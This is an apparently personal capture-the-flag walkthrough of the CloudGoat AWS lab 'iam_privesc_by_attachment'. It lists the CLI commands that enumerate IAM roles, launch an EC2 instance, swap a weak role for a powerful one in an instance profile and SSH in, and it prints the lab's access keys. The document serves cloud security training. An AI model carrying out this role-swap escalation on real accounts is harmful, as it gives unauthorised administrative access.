iam_privesc_by_attachment

# Deploy
% ./cloudgoat.py create scenarios/iam_privesc_by_attachment/
% cat /home/hnl/Desktop/ctf/cloud-goat/cloudgoat/iam_privesc_by_attachment_cgidc7g4el7tyy/start.txt
cloudgoat_output_aws_account_id = 287336331436
cloudgoat_output_kerrigan_access_key_id = AKIAUFZUUPCWNOKOCQ5F
cloudgoat_output_kerrigan_secret_key = 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
% aws configure --profile kerrigan
% aws iam list-users --profile kerrigan

# Start
% aws iam list-user-policies --user-name kerrigan --profile kerrigan

An error occurred (AccessDenied) when calling the ListUserPolicies operation: User: arn:aws:iam::287336331436:user/kerrigan is not authorized to perform: iam:ListUserPolicies on resource: user kerrigan

% aws iam list-attached-user-policies --user-name kerrigan --profile kerrigan

An error occurred (AccessDenied) when calling the ListAttachedUserPolicies operation: User: arn:aws:iam::287336331436:user/kerrigan is not authorized to perform: iam:ListAttachedUserPolicies on resource: user kerrigan

% aws iam list-roles --profile kerrigan
{
    "Roles": [
        {
            "Path": "/",
            "RoleName": "cg-ec2-meek-role-iam_privesc_by_attachment_cgidc7g4el7tyy",
            "RoleId": "AROAUFZUUPCWGE77S6ZF2",
            "Arn": "arn:aws:iam::287336331436:role/cg-ec2-meek-role-iam_privesc_by_attachment_cgidc7g4el7tyy",
            "CreateDate": "2021-09-10T03:39:22Z",
            "AssumeRolePolicyDocument": {
                "Version": "2012-10-17",
                "Statement": [
                    {
                        "Effect": "Allow",
                        "Principal": {
                            "Service": "ec2.amazonaws.com"
                        },
                        "Action": "sts:AssumeRole"
                    }
                ]
            },
            "MaxSessionDuration": 3600
        },
        {
            "Path": "/",
            "RoleName": "cg-ec2-mighty-role-iam_privesc_by_attachment_cgidc7g4el7tyy",
            "RoleId": "AROAUFZUUPCWON6UAXZZR",
            "Arn": "arn:aws:iam::287336331436:role/cg-ec2-mighty-role-iam_privesc_by_attachment_cgidc7g4el7tyy",
            "CreateDate": "2021-09-10T03:39:23Z",
            "AssumeRolePolicyDocument": {
                "Version": "2012-10-17",
                "Statement": [
                    {
                        "Effect": "Allow",
                        "Principal": {
                            "Service": "ec2.amazonaws.com"
                        },
                        "Action": "sts:AssumeRole"
                    }
                ]
            },
            "MaxSessionDuration": 3600
        }
    ]
}

% aws iam list-instance-profiles --profile kerrigan
{
    "InstanceProfiles": [
        {
            "Path": "/",
            "InstanceProfileName": "cg-ec2-meek-instance-profile-iam_privesc_by_attachment_cgidc7g4el7tyy",
            "InstanceProfileId": "AIPAUFZUUPCWMZ3BMHXHP",
            "Arn": "arn:aws:iam::287336331436:instance-profile/cg-ec2-meek-instance-profile-iam_privesc_by_attachment_cgidc7g4el7tyy",
            "CreateDate": "2021-09-10T03:39:28Z",
            "Roles": [
                {
                    "Path": "/",
                    "RoleName": "cg-ec2-meek-role-iam_privesc_by_attachment_cgidc7g4el7tyy",
                    "RoleId": "AROAUFZUUPCWGE77S6ZF2",
                    "Arn": "arn:aws:iam::287336331436:role/cg-ec2-meek-role-iam_privesc_by_attachment_cgidc7g4el7tyy",
                    "CreateDate": "2021-09-10T03:39:22Z",
                    "AssumeRolePolicyDocument": {
                        "Version": "2012-10-17",
                        "Statement": [
                            {
                                "Effect": "Allow",
                                "Principal": {
                                    "Service": "ec2.amazonaws.com"
                                },
                                "Action": "sts:AssumeRole"
                            }
                        ]
                    }
                }
            ]
        }
    ]
}

% aws ec2 describe-instances --profile kerrigan --region us-east-1

# Create key pair
% aws ec2 create-key-pair --key-name scenario.pem --query 'KeyMaterial' --output text > scenario.pem --region us-east-1 --profile kerrigan

# Create Instance using key pair
aws ec2 run-instances --image-id ami-0a313d6098716f372 \
--instance-type t2.micro \
--iam-instance-profile Arn=arn:aws:iam::287336331436:instance-profile/cg-ec2-meek-instance-profile-iam_privesc_by_attachment_cgidc7g4el7tyy \
--key-name scenario.pem \
--subnet-id subnet-005c5f0c7147a7076 \
--security-group-ids sg-0707a6096c22c9ebf \
--profile kerrigan \
--region us-east-1

aws iam remove-role-from-instance-profile \
--instance-profile-name cg-ec2-meek-instance-profile-iam_privesc_by_attachment_cgidc7g4el7tyy \
--role-name cg-ec2-meek-role-iam_privesc_by_attachment_cgidc7g4el7tyy \
--profile kerrigan

aws iam add-role-to-instance-profile \
--instance-profile-name cg-ec2-meek-instance-profile-iam_privesc_by_attachment_cgidc7g4el7tyy \
--role-name cg-ec2-mighty-role-iam_privesc_by_attachment_cgidc7g4el7tyy \
--profile kerrigan

ssh -i "scenario.pem" ubuntu@ec2-52-207-225-132.compute-1.amazonaws.com

aws ec2 terminate-instances --instance-ids i-0d38448b97c0c4e63 --region us-east-1
Previouscloud_breach_s3 Nextiam_privesc_by_rollback
Last updated 4 years ago
Was this helpful?